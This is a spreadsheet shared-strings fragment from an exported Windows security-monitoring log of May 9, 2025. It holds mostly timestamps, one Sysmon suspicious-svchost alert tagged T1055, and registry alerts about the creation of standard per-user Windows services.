    <t>May 9, 2025 @ 13:56:18.298</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.299</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.300</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.301</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.302</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.380</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.386</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.525</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.532</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.533</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.609</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.756</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.764</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.766</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.775</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.839</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.841</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.299</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.590</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.598</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.599</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.600</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.672</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.676</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.681</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.756</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.759</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.836</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.837</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.838</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.847</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.848</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.852</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.853</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.924</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.925</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.926</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:19.929</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:20.002</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:20.005</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:20.006</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:20.706</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:20.707</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:20.714</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:20.893</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:20.896</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:20.897</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:21.963</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:21.964</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:21.967</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:21.968</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:21.970</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:22.040</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:22.041</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:23.479</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:23.524</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:23.604</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:23.605</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:23.606</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:24.625</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:24.629</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:24.703</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:24.783</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:24.784</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.679</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.753</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.758</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.763</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.829</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.836</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.903</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.905</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.906</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.907</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.929</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.930</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.984</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:25.988</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:26.056</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:26.057</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:26.058</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:26.793</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:26.795</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:26.875</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:26.883</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:26.885</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:26.965</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:26.970</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:26.971</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:26.976</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:32.721</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:32.734</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:35.808</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:35.810</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:36.629</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:48.774</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:48.779</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:49.437</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:54.335</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:55.635</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:55.663</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:56.904</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:56.907</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:56.923</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:21.765</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:21.849</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:34.730</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:35.092</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:35.147</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:35.942</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:35.954</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:35.965</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:36.021</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:36.024</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:36.025</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:37.055</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:37.058</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:37.062</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:37.068</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:37.076</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:37.099</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:37.140</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:37.152</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:37.227</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:37.229</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:37.244</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.070</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.183</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.185</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.217</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.218</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.219</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.222</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.223</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.313</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.315</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.319</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.325</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.339</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.349</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.474</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:38.487</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.198</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.202</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.203</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.204</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.205</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.275</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.276</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.277</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.279</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.282</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.283</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.345</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:39.346</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:40.163</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:40.171</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:40.172</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:40.198</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:40.199</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:40.200</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:41.208</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:41.338</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:41.341</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:41.414</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.503</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.505</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.507</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.717</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.719</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.720</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.721</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.722</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.725</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.726</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.727</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.730</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.793</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.794</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.799</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:42.942</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.708</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.805</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.809</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.812</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.815</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.818</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.823</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.826</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.829</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.832</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.835</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.838</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:43.912</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:45.635</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:46.762</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:46.816</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:46.817</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:46.818</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:47.822</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:47.823</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:47.834</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:47.838</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:47.870</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:47.871</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:49.509</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:49.510</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:49.514</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:50.441</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:50.444</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:50.483</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:50.513</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:57:50.514</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:06.227</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:06.234</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:11.147</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:11.157</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:11.164</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:11.609</t>
  </si>
  <si>
    <t>Windows Sysmon error event</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:12.236</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:12.238</t>
  </si>
  <si>
    <t>Sysmon - Suspicious Process - svchost.exe</t>
  </si>
  <si>
    <t>[T1055]</t>
  </si>
  <si>
    <t>[Process Injection]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:12.259</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:12.387</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:12.456</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:12.528</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:12.608</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:12.652</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:12.806</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:12.807</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:12.855</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:12.990</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:13.035</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:13.036</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:13.074</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:13.112</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:13.113</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:13.114</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:13.182</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:13.188</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:13.196</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:14.705</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:14.718</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:14.811</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:14.815</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:18.346</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:18.347</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:18.416</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:18.739</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:18.835</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:18.885</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:19.526</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:19.527</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:20.679</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:20.696</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:24.197</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:26.879</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:26.947</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:27.715</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:28.527</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:28.617</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:28.621</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:31.423</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:31.446</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:31.481</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:32.998</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:43.550</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:50.428</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:50.429</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:52.192</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:52.197</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:52.206</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:54.425</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:54.426</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:54.427</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:58:59.900</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:59:59.911</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:00.197</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:00.198</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:03.472</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:03.521</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:04.865</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:10.219</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:10.248</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:10.251</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:10.253</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:10.265</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:11.671</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:11.823</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\AarSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k AarSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:11.824</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:11.898</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k BcastDVRUserService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:11.923</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:11.956</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k BthAppGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:11.994</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.116</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.122</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CaptureService_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.202</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k ClipboardSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.233</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.376</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CloudBackupRestoreSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.377</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\CredentialEnrollmentManager.exe</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.378</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.414</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.421</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.428</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\MessagingService_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.535</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\NPSMSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.606</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.664</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\P9RdrService_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k P9RdrService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.733</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PenService_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k PenService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.813</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.840</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.847</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.911</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k PrintWorkflow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.912</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.913</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UdkUserSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UdkSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.928</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\System32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.929</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.961</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\webthreatdefusersvc_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:12.962</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_11057d\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:14.860</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:14.861</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:14.926</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:15.299</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:15.303</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:15.322</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:16.332</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:18.697</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:19.920</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:19.921</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:19.991</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:19.999</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:20.010</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:20.109</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:21.992</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:22.728</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:24.866</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:24.931</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:25.060</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:25.173</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:25.302</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:25.759</t>
  </si>
